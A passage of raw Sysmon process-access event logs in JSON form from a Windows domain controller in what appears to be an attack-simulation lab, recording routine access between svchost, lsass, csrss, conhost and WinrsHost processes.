{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5523,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5524,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5525,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-001047A10700}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-001047A10700}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5526,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.237\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-001047A10700}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010DBE10800}\r\nTargetProcessId: 2124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.237","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-001047A10700}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010DBE10800}","TargetProcessId":"2124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5527,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010DBE10800}\r\nTargetProcessId: 2124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010DBE10800}","TargetProcessId":"2124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5528,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.252\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nSourceProcessId: 1312\r\nSourceThreadId: 2552\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010DBE10800}\r\nTargetProcessId: 2124\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.252","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","SourceProcessId":"1312","SourceThreadId":"2552","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010DBE10800}","TargetProcessId":"2124","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5529,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.268\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.268","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5530,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.268\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.268","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5531,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.268\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 